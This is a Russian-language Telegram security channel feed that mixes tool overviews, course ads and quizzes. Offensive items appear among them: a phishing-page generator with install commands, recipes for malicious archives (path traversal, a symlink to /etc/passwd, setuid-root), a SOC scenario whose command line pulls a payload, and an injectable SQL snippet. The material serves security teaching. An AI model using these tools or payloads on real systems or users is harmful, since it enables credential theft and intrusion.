Prowler: инструмент для аудита безопасности облачных сред
🔤 Ключевые возможности:
- Поддержка основных облачных провайдеров (AWS, Azure, GCP).
- Проверка на соответствие стандартам безопасности (CIS, NIST, SOC 2, PCI DSS и др.)
- Вывод результатов в CSV, JSON, HTML, интеграция с Slack, Security Hub, Jira.
- Работает через Docker, CLI или напрямую из кода.
🔤 Начало работы
🔤 Создаем виртуальное окружение в директории с достаточным местом
🔤 Устанавливаем Prowler
🔤 Проверяем
🔤 Настройка доступа к облаку
Для AWS:
🔤 Запуск базовой проверки для AWS
Выборочные проверки
Полный аудит по CIS Level 1
🔤 Генерация отчета
JSON-отчет
HTML-отчет
🔤 Используйте для ежедневного мониторинга
🔤 Преимущества
- Автоматизированная проверка сотен контрольных точек безопасности.
- Соответствие регуляторным требованиям.
- Интеграция в CI/CD (может быть встроен в процессы DevOps для раннего обнаружения уязвимостей).
Prowler — это open-source инструмент, предназначенный для автоматизированного аудита безопасности облачных сред (AWS, Azure и Google Cloud), и проверки соответствия облачных инфраструктур международным стандартам, включая CIS Benchmark, ISO 27001, GDPR, HIPAA и другие. С его помощью можно выявлять уязвимости, ошибки конфигурации и потенциальные векторы атак.
- Поддержка основных облачных провайдеров (AWS, Azure, GCP).
- Проверка на соответствие стандартам безопасности (CIS, NIST, SOC 2, PCI DSS и др.)
- Вывод результатов в CSV, JSON, HTML, интеграция с Slack, Security Hub, Jira.
- Работает через Docker, CLI или напрямую из кода.
python3 -m venv /tmp/prowler-venv --clear
source /tmp/prowler-venv/bin/activate
pip install prowler-cloud
prowler -v
Для AWS:
export AWS_ACCESS_KEY_ID="XXX"
export AWS_SECRET_ACCESS_KEY="XXX"
export AWS_SESSION_TOKEN="XXX" # если используется временный токен
Выборочные проверки
prowler -c check1,check2
Полный аудит по CIS Level 1
prowler -g cis_level1
JSON-отчет
prowler -M json -F report.json
HTML-отчет
prowler -M html -F report.html
prowler aws -b -q -M html > report-$(date +%F).html
- Автоматизированная проверка сотен контрольных точек безопасности.
- Соответствие регуляторным требованиям.
- Интеграция в CI/CD (может быть встроен в процессы DevOps для раннего обнаружения уязвимостей).
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍6🔥4
Что разберём?
Спикер: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.
Регистрируйтесь сейчас и получите ссылку на эфир!
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤14👍6🔥6
Ведущий: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.
Вы еще успеваете присоединиться!
Please open Telegram to view this post
VIEW IN TELEGRAM
webinar-devops.codeby.school
Вебинар «CI/CD: основы и инструменты автоматизации DevOps» — бесплатная практика для разработчиков
Присоединяйтесь к бесплатному вебинару «Основы и инструменты CI/CD» 18 июня в 19:00 МСК. Разберём этапы CI/CD-пайплайна, лучшие инструменты автоматизации (Jenkins, GitLab CI/CD, GitHub Actions, ArgoCD), покажем практику на реальном примере. Ведущий — Алексей…
❤13👍8🔥8
Airdump-ng
Airodump-ng — это утилита для захвата пакетов, которая используется в рамках набора инструментов aircrack-ng. Она позволяет собирать сырые фреймы 802.11, что делает её полезной для анализа беспроводных сетей и сбора данных о WEP и WPA шифровании.
💡 Основные функции:
⏺️ Захват трафика - Airodump-ng позволяет захватывать пакеты, проходящие через беспроводную сеть, что помогает в анализе трафика и выявлении уязвимостей.
⏺️ Отображение информации о сетях - Утилита выводит информацию о доступных точках доступа, включая их BSSID, ESSID, уровень сигнала и используемый канал.
⏺️ Сбор данных о клиентах - Airodump-ng также отображает информацию о подключенных клиентах, что позволяет отслеживать активность пользователей в сети.
📎 Установка:
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:
📌 Использование:
1️⃣ Запуск утилиты
Airodump-ng — это утилита для захвата пакетов, которая используется в рамках набора инструментов aircrack-ng. Она позволяет собирать сырые фреймы 802.11, что делает её полезной для анализа беспроводных сетей и сбора данных о WEP и WPA шифровании.
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:
git clone https://github.com/aircrack-ng/aircrack-ng.git
sudo airodump-ng [INTERFACE]
Утилита автоматически перевела мой сетевой адаптер в режим монитора.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥5👍4
Курс по реагированию на киберинциденты — завтра последний день по старой цене! Следующий поток через 2 месяца!
РКИ — это не теория. Это практический курс, после которого вы будете:
🟧 собирать дампы с Windows/Linux,
🟧 анализировать логи и вредоносное ПО,
🟧 работать с SIEM и проводить Threat Hunting,
🟧 грамотно реагировать на атаки и искать следы проникновения.
🟧 До 19 июня 🟧 77 990 ₽ 57 990 ₽ 🟧 Сертификат
🟧 🟧 🟧 🟧 Подписка на hackerlab.pro — 40+ заданий по форензике и реагированию!
Если хотите попасть на поток по старой цене — успейте до конца дня.
🟧 Начать обучение сегодня
🚀 @Codeby_Academy
РКИ — это не теория. Это практический курс, после которого вы будете:
Если хотите попасть на поток по старой цене — успейте до конца дня.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤7🔥6
Злоумышленник осуществляет инъекцию произвольного JavaScript-кода через уязвимое поле пользовательского ввода (комментарии). Вредоносный скрипт сохраняется на сервере и исполняется в контексте сессии аутентифицированных пользователей при отображении заражённой страницы.
В результате:
• Происходит несанкционированное выполнение операций от имени жертвы.
• Возможна компрометация сессионных cookie (при отсутствии HttpOnly).
• Реализуется цепочка атак для эскалации привилегий.
🟧 Бонусный вопрос: Какие два основных метода защиты наиболее эффективны против этой уязвимости?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤5🔥3
К какому типу уязвимостей относится данная атака?
Anonymous Poll
74%
XSS (Cross-Site Scripting)
13%
SSRF (Server-Side Request Forgery)
8%
RCE (Remote Code Execution)
5%
IDOR (Insecure Direct Object Reference)
👍13👎8❤5🔥4
Инструмент для сбора информации, использующий GitHub Code Search API. GitHound ищет открытые ключи API и другую конфиденциальную информацию на GitHub с помощью поиска кода на GitHub, сопоставления шаблонов и поиска в истории коммитов. В отличие от других инструментов он ищет по всему GitHub, а не только в определённых репозиториях, у пользователей или в организациях.
Доступны результаты поиска в режиме реального времени с помощью GitHound Explore или с помощью флага --dashboard.
Скачайте последнюю версию со страницы релизов.
Распаковываем архив:
unzip git-hound_linux_amd64.zip
Добавляем API-токен github в config.yml
В качестве альтернативы можно использовать переменные окружения, которые будут переопределять значения в config.yml:
GITHOUND_GITHUB_TOKEN: Устанавливает токен доступа к API GitHub.
GITHOUND_INSERT_KEY: Устанавливает ключ вставки GitHoundExplore для функции --dashboard.
GitHound использует базу данных регулярных выражений для ключей API, поддерживаемую авторами Gitleaks.
GitHound находит ключи API с помощью комбинации точных регулярных выражений для распространённых сервисов, таких как Slack и AWS, и универсального регулярного выражения API с учётом контекста. Это позволяет находить длинные строки, похожие на ключи API, которые окружены ключевыми словами, такими как Authorization и «API-Token». GitHound предполагает, что это ложные срабатывания, а затем проверяет их легитимность с помощью энтропии Шеннона, проверки слов из словаря, расчёта уникальности и обнаружения кодировки.
Далее он выводит результаты с высокой степенью достоверности. Для файлов, в которых кодируются секреты, он декодирует строки в формате base64 и ищет в закодированных строках ключи API.
echo "\"uberinternal.com\"" | githound --dig-files --dig-commitst --threads 100
--dig-files - Просматривает файлы репозитория, чтобы найти больше секретов;
--dig-commits - Просматривает историю коммитов, чтобы найти больше секретов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤6👍5
В новом видео — разбор лабораторной работы от Дениса Соколова: пентест WordPress от первоначального доступа до повышения привилегий.
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.
📺 Смотреть на YouTube
™️ Смотреть в VK
Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
🟧 Запись на курс «Профессия Пентестер» до 3 июля.
Начать обучение сейчас.
🚀 @Codeby_Academy
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.
Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
Начать обучение сейчас.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍9🔥8😁1
Фрустрация в CTF: почему опускаются руки и как с этим бороться
🟧 Каждый, кто участвовал в CTF, знает это чувство: задача кажется нерешаемой, время уходит, а флаг так и не поддается.
В новой статье разбираем:
🟧 Почему возникает фрустрация в CTF (и почему это нормально)
🟡 Практические способы выйти из ступора
🟡 Как сохранить мотивацию, даже когда всё кажется безнадежным
🟡 Где искать помощь и вдохновение
🟧 Советы подойдут и новичкам, и опытным игрокам. Главное — понять: трудности не означают поражение.
🟧 Читайте в статью, применяйте рекомендации, и пусть ни один флаг не устоит!
В новой статье разбираем:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18👍13🔥11
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Последний танец
🔎 Категория OSINT — Народный автомобиль
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤9👍7
В нашей новой статье «Я ничего не помню: как не забыть выученное. Методы обучения для информационной безопасности» вы узнаете:
Статья — без воды, с реальными техниками, ссылками и примерами для применения уже сегодня.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16👍12🔥8👎3
Вы — SOC-аналитик. В сети компании обнаружена утечка конфиденциальных файлов. Вот что удалось собрать:
*️⃣ В 09:15 сотрудник получил письмо с темой «Договор о защите информационных систем №-4513 на подпись» от якобы доверенного контрагента.*️⃣ В 09:20 он открыл вложение — файл contract_scanned.exe, маскирующийся под PDF.*️⃣ В 09:22 на его ПК (Windows 10) запустился процесс msbuild.exe с необычными аргументами:
/tmp:7a3f1 /payload:http://malware[.]xyz/get.dll*️⃣ В 09:25 этот процесс подключился к IP 91.234.18.77 (порт 8443) и начал массово копировать файлы из сетевой папки \\NAS\Information\.
💬 Какие индикаторы компрометации (IOCs), помимо указанных в описании инцидента, можно выделить для дальнейшего поиска подобных атак в сети компании? Делитесь своими идеями!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔10👍7❤6
Какая тактика MITRE ATT&CK здесь применена? 🟧
Anonymous Poll
19%
T1195
45%
T1204.002
23%
T1059.001
13%
T1134
🔥13👍8❤5👎2🤔1😱1
NexPhisher
NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.
💡 Основные функции:
⏺️ Выбор нескольких сервисов - Утилита имеет большой выбор, до 30 сервисов.
⏺️ Понятный интерфейс - Программа очень простая и справится каждый.
⏺️ Большой выбор хоста - есть известные Ngrok, Serveo и новые LocalHostRun, LocalXpose.
📎 Установка:
📌 Использование:
1️⃣ Запуск утилиты
NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.
git clone https://github.com/htr-tech/nexphisher.git
cd nexphisher
./setup
bash nexphisher
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥5😭1
Киберпреступления оставляют цифровые следы. Научитесь их находить.
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!
⌨️ Регистрация здесь
Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО
Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
🚀 @Codeby_Academy
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!
Что вас ждёт на курсе:
Кому подходит курс:
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍9🔥7😁1
В приложении есть следующий код:
SELECT * FROM users WHERE username = '" + userInput + "' AND password = '" + userPassword + "';
К какой уязвимости подвержен данный код?
Пиши свой ответ в комментарии
Please open Telegram to view this post
VIEW IN TELEGRAM
😁33👏7💯7❤🔥6👎3
Как построить успешную карьеру в тестировании на проникновение? Всё начинается с прочного базиса — тех знаний, без которых даже самые мощные инструменты останутся бесполезными.
В статье рассмотрим:
⭐ Как эффективно изучить Linux, сети и Python
⭐ Где получить реальную практику
⭐ Ошибки новичков и как их избежать
Среди обилия информации системный подход к обучению становится ключевым.
Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
⭐ Освоить практические навыки пентеста
⭐ Подготовиться к экзамену OSCP
⭐ Получить практические задания с экспертной проверкой
➡️ Читайте полный гайд
В статье рассмотрим:
Среди обилия информации системный подход к обучению становится ключевым.
Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
Please open Telegram to view this post
VIEW IN TELEGRAM
💯9❤🔥5👍4👏4❤3🔥2
archivealchemist — инструмент для создания специально разработанных архивов для тестирования уязвимостей при извлечении данных.
❗️ Характеристики
⏺️ Создание ZIP- и TAR-архивов с вредоносными шаблонами;
⏺️ Поддержка атак с обходом пути;
⏺️ Поддержка символических и жестких ссылок;
⏺️ Возможность устанавливать специальные биты разрешений (setuid, setgid, sticky bit);
⏺️ Точный контроль над атрибутами файлов (режим, владелец, группа, время изменения);
⏺️ Команды манипулирования: добавить, заменить, дополнить, изменить;
⏺️ Вспомогательные команды: извлечение, список, чтение;
⏺️ Создание файлов polyglot (дополните архив данными + настройте заголовки).
⬇️ Установка
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
⚡️ Использование
Архив с полезной нагрузкой для обхода путей:
Архив с символической ссылкой, указывающей на конфиденциальный файл:
Создание исполняемого файла с правами суперпользователя:
Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF
Поддерживает следующие команды
🌟 add - добавление файлов, каталогов, символических или жестких ссылок в архив;
🌟 replace - замена существующих файлов или каталогов в архиве;
🌟 append - добавление дополнительного содержимого к существующим файлам в архиве;
🌟 modify - изменение атрибутов файла или преобразование файлов в символические/жесткие ссылки;
🌟 remove/rm - удаление файлов, каталогов, символических или жестких ссылок из архива;
🌟 list/ls - отображение содержимого архива;
🌟 extract - извлечение файлов из архива в файловую систему;
🌟 read/cat - чтение файла из архива в стандартный вывод;
🌟 polyglot - добавление содержимое в архив, сохраняя его валидным.
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
git clone https://github.com/avlidienbrunn/archivealchemist
cd archivealchemist
chmod +x archive-alchemist.py
sudo ln -s $(pwd)/archive-alchemist.py /usr/local/bin/archive-alchemist
Архив с полезной нагрузкой для обхода путей:
archive-alchemist zipslip.zip add "../../../tmp/evil.txt" --content "I escaped the extraction directory!"
Архив с символической ссылкой, указывающей на конфиденциальный файл:
archive-alchemist symlink_attack.tar -t tar add .bashrc --symlink "/etc/passwd"
Создание исполняемого файла с правами суперпользователя:
archive-alchemist setuid_attack.tar -t tar add exploit --content "#!/bin/sh\nwhoami" --mode 0755 --setuid --uid 0
Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF
archive-alchemist polyglot.gif add payload.txt --content "hello there"
Поддерживает следующие команды
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤8👍8
О каком типе атаки идет речь?
Anonymous Poll
7%
SQL Injection
41%
Phishing
38%
CSRF (Cross-Site Request Forgery)
14%
Cross-Site Scripting (XSS)
😁15👍4❤3🔥2😭2